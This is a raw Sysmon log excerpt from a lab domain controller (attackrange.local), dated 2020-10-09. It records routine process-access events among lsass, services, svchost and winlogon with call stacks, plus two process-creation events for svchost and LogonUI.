10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000782Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0A00-000000007F01}852928C:\Windows\system32\services.exe{733EE690-3DF9-5F80-1000-000000007F01}1132C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000781Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0A00-000000007F01}852948C:\Windows\system32\services.exe{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d608|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+43e3b|C:\Windows\System32\RPCRT4.dll+46a2a|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000780Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000779Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.618{733EE690-3DF9-5F80-0F00-000000007F01}1124C:\Windows\System32\svchost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for Windows ServicesMicrosoft® Windows® Operating SystemMicrosoft Corporationsvchost.exeC:\Windows\System32\svchost.exe -k termsvcsC:\Windows\system32\NT AUTHORITY\NETWORK SERVICE{733EE690-3DF9-5F80-E403-000000000000}0x3e40SystemMD5=36F670D89040709013F6A460176767EC,SHA256=438B6CCD84F4DD32D9684ED7D58FD7D1E5A75FE3F3D12AB6C788E6BB0FFAD5E7,IMPHASH=2CED93915677390B76EE1916B92F3EF6{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x8000000000000000778Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000777Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000776Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881104C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000775Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}8681096C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000774Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000773Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000772Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000771Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000770Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000769Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000768Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}868900C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000767Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}868988C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0A00-000000007F01}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000766Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0800-000000007F01}724740C:\Windows\system32\csrss.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000765Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0900-000000007F01}780784C:\Windows\system32\winlogon.exe{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\winlogon.exe+193b7|C:\Windows\system32\winlogon.exe+22617|C:\Windows\system32\winlogon.exe+2b287|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x8000000000000000764Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.606{733EE690-3DF9-5F80-0E00-000000007F01}1088C:\Windows\System32\LogonUI.exe10.0.14393.0 (rs1_release.160715-1616)Windows Logon User Interface HostMicrosoft® Windows® Operating SystemMicrosoft Corporationlogonui.exe"LogonUI.exe" /flags:0x2 /state0:0xa3b99855 /state1:0x41c64e6dC:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e71SystemMD5=B38DFCF985D8AE5B1A17C264981E61C7,SHA256=AA62D29803D52EC06CD27ED3124E034048F09606EB7342181913C9817C7B44C5,IMPHASH=A6F3A84D171E55B51A7343E05C8DFAC3{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\System32\winlogon.exewinlogon.exe 10341000x8000000000000000763Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF9-5F80-0C00-000000007F01}5881060C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0B00-000000007F01}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+7f5d|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000762Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000761Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000760Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.604{733EE690-3DF7-5F80-0B00-000000007F01}868100C:\Windows\system32\lsass.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6a54|C:\Windows\System32\RPCRT4.dll+112df|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000759Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:39:53.542{733EE690-3DF9-5F80-0C00-000000007F01}5881036C:\Windows\system32\svchost.exe{733EE690-3DF7-5F80-0900-000000007F01}780C:\Windows\system32\winlogon.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+796b|c:\windows\system32\lsm.dll+2387f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000758Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 